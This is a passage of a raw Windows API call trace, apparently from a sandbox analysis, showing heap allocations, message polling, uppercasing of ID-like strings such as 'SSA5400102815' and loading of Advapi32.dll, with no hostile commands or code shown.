(in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.044] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0257.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.046] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0257.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.047] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.048] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.048] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.048] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.049] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.049] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.049] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.051] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0257.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.052] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.053] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.053] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.053] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.054] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0257.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.055] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.055] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.055] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.055] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.056] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.056] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 